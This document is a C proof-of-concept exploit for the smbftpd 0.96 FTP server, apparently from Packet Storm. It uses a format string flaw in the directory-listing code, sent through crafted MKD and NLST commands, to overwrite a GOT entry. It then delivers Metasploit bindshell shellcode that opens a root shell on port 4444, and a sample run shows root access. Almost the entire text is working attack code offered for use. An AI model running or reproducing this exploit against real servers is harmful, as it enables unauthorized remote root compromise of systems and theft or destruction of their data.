smbftpd version 0.96 SMBDirList-function remote format string exploit that binds a TCP shell to port 4444.
7cd227498cd3b6732f3ce379d3646174ad78a79fe9814dbde04896faa85140d1/*
* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
*
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
*
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
*
*
* - Jerry Illikainen <jerry@debork.se>
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <unistd.h>
#include <stdlib.h>
#define GOT 0x080591d8 // GOT entry for chdir
#define BSS 0x0805a791 // this is where the jumpcode will be written
#define DEBUG(d) if (debug) d;
#define MAXPATH 255
#define BUFSIZE 512
unsigned int debug = 0;
/* bindshell (port 4444) from metasploit.com
* restricted chars = 0x00 0x0a 0x0d */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3"
"\xef\xd7\xdb\x83\xeb\xfc\xe2\xf4\x92\x34\x84\x98\xf0\x85\xd5\xb1"
"\xc5\xb7\x4e\x52\x42\x22\x57\x4d\xe0\xbd\xb1\xb3\xb2\xb3\xb1\x88"
"\x2a\x0e\xbd\xbd\xfb\xbf\x86\x8d\x2a\x0e\x1a\x5b\x13\x89\x06\x38"
"\x6e\x6f\x85\x89\xf5\xac\x5e\x3a\x13\x89\x1a\x5b\x30\x85\xd5\x82"
"\x13\xd0\x1a\x5b\xea\x96\x2e\x6b\xa8\xbd\xbf\xf4\x8c\x9c\xbf\xb3"
"\x8c\x8d\xbe\xb5\x2a\x0c\x85\x88\x2a\x0e\x1a\x5b";
void usage (char *arg)
{
printf("%s [options]\n"
"\t -h <host>\n"
"\t -p <port>\n"
"\t -u <usernmae - default anonymous>\n"
"\t -P <password - default none>\n\n", arg);
exit(1);
}
int sock (int port, char *host)
{
struct hostent *h;
struct sockaddr_in addr;
int s;
if ((h = gethostbyname(host)) == NULL)
{
perror("[!] gethostbyname");
exit(1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("[!] socket");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
memset(addr.sin_zero, '\0', sizeof addr.sin_zero);
if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) == -1)
{
perror("[!] connect");
exit(1);
}
return s;
}
char *s_send (int s, char *m, char *fmt, ...)
{
static char buf[BUFSIZE];
char str[BUFSIZE];
ssize_t nb;
va_list ap;
va_start(ap, fmt);
vsnprintf(str, BUFSIZE-1, fmt, ap);
va_end(ap);
if (send(s, str, strlen(str), 0) == -1)
{
perror("[!] send");
exit(1);
}
DEBUG(printf("send: %s\n", str));
for (;;)
{
nb = recv(s, buf, BUFSIZE-1, 0);
buf[nb-1] = '\0';
if (m == NULL)
return buf;
else if (strstr(buf, m) != NULL)
return buf;
}
}
void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH])
{
unsigned char a[4], b[4];
char *dir = mkd[0];
unsigned int i, offset = 1052, start = 256, base = 4;
int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];
for (i = 0; i <= 4; i++)
{
a[0] = (int)pa >> 24;
a[1] = ((int)pa & 0xff0000) >> 16;
a[2] = ((int)pa & 0xff00) >> 8;
a[3] = (int)pa & 0xff;
b[0] = (int)pb >> 24;
b[1] = ((int)pb & 0xff0000) >> 16;
b[2] = ((int)pb & 0xff00) >> 8;
b[3] = (int)pb & 0xff;
snprintf(dir, MAXPATH-1,
"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
a[3], a[2], a[1], a[0],
a[3] + 1, a[2], a[1], a[0],
a[3] + 2, a[2], a[1], a[0],
a[3] + 3, a[2], a[1], a[0],
b[3] - 12 + start - (base + 4 - (base%4)), offset,
b[2] - b[3] + start, offset + 1,
b[1] - b[2] + start, offset + 2,
b[0] - b[1] + start, offset + 3);
dir = mkd[i];
if (i < 3)
{
pa = (int *)jmpaddr[i];
pb = (int *)jmpc[i];
} else {
pa = (int *)got;
pb = (int *)jmpaddr[0];
}
}
}
int main (int argc, char **argv)
{
int s[2], c, port = 21, pasv[5];
unsigned int i;
char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;
char mkd[5][MAXPATH], sc[2048];
int
got = GOT,
jmpaddr[] = { BSS, BSS+4, BSS+8 },
jmpc[] = {
0x1234ba66, // mov dx, 0x1234 - 66 ba 34 12
0xc2396658, // pop eax - 58
0xe4fffa75 // cmp ax,dx - 66 39 c2
// jne $-4 - 75 fa
// jmp esp - ff e4
};
while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1)
{
switch (c)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
case 'P':
pass = optarg;
break;
case '?':
default:
usage(argv[0]);
break;
}
}
if (host == NULL)
usage(argv[0]);
printf("[+] GOT: %p - .bss (jmpcode): %p\n", (void *)got, (void *)jmpaddr[0]);
fmt(jmpaddr, jmpc, got, mkd);
printf("[+] %s:%d (user: %s pass: %s)\n", host, port, user, pass);
s[0] = sock(port, host);
s_send(s[0], "331", "USER %s\n", user);
p = s_send(s[0], NULL, "PASS %s\n", pass);
if (strstr(p, "230") == NULL)
{
printf("[!] login failed\n");
exit(1);
}
p = s_send(s[0], NULL, "MKD %s\nMKD %s\nMKD %s\n", mkd[0], mkd[1], mkd[2]);
if (strstr(p, "257") == NULL)
{
printf("[!] couldn't make directories\n");
exit(1);
}
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
printf("[+] writing jumpcode\n");
s_send(s[0], NULL, "NLST -R\n");
s_send(s[0], NULL, "RMD %s\nRMD %s\nRMD %s\n", mkd[0], mkd[1], mkd[2]);
close(s[1]);
s_send(s[0], NULL, "MKD %s\n", mkd[3]);
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
exit(1);
for (i = 0; i < 5; i++)
{
if ((tmp = strtok(NULL, ",")) == NULL)
{
printf("[!] aborting\n");
exit(1);
}
pasv[i] = atoi(tmp);
}
s[1] = sock(pasv[3]*256+pasv[4], host);
memset(sc, 0x90, sizeof(sc)); // some nops before and
memcpy(sc+3, "\x34\x12", 2); // after the "mark"
memcpy(sc+12, shellcode, sizeof(sc)-12);
printf("[+] overwriting GOT entry and sending shellcode\n\n");
s_send(s[0], NULL, "NLST -R%s\n", sc);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed